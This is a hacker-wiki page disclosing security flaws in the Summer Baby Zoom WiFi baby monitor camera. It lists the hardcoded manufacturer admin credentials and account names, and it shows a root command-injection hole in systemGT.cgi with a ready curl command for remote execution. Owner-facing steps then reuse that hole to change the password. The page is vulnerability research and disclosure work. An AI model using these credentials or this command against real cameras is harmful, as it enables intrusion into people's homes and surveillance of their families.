Summer Baby Zoom WiFi​​

From Exploitee.rs
Revision as of 01:22, 7 February 2016 by Resno (talk | contribs) (Text replacement - "gtvcom-20" to "exploiteers-20")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

Summer Baby Zoom WiFi.jpg

This page will be dedicated to a general overview, descriptions, and information related to the Summer Baby Zoom WiFi​​ Camera.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Summer Baby Zoom WiFi​​ Camera at Amazon

Disassembly

UART

The pin-out for UART can be found on the images below.

Hardcoded MFG Credentials

The Summer Baby Zoom WiFi has an administrative username and password that can be used to access the cam and which does not change. This set of credentials is one of 3 sets with the other 2 being specific to the camera itself and matching the password listed on the camera.

  • Hardcoded Username: MsC@dm1n!
  • Hardcoded Password: Auth3nt1c@T3

Summer Baby Zoom WiFi Hardcoded Credentials.png

Other Accounts

The two accounts which use the password listed on the camera are:

  • Normal Priviledged Username: V13w3r
  • Admin Username: SnApAdm1n

Summer Baby Zoom WiFi Hardcoded Credentials 2.png

Command Execution Through systemGT.cgi

The "systemGT.cgi" script contains a method of executing commands as a root user on the Summer BabyZoom WiFi.

disassembly from a systemGT handling function from "/bin/mini_httpd"

In the image above you can see that the value supplied within the posted "systemGT" variable is combined with an ampersand and executed with the imported "system" function call. This allows us to use the following curl call to execute commands remotely on the device.

curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=COMMANDHERE"


Demo

Fixing "Hard Coded" Credentials

Since the credentials are stored in nvram the process to change them is easy but could lead to some issues with the main binary that runs on the device. However if you wish to proceed the process is simple and can be done leveraging the systemGT script.

To fix follow these instructions:

  1. On a Linux or OSX machine enter the following command to change the password to your desired password.
    curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram set UserSetSetting.userList.users1.password%3DNEW_PASSWORD_HERE"
  2. Commit password changes made above.
    curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"
  3. Finished!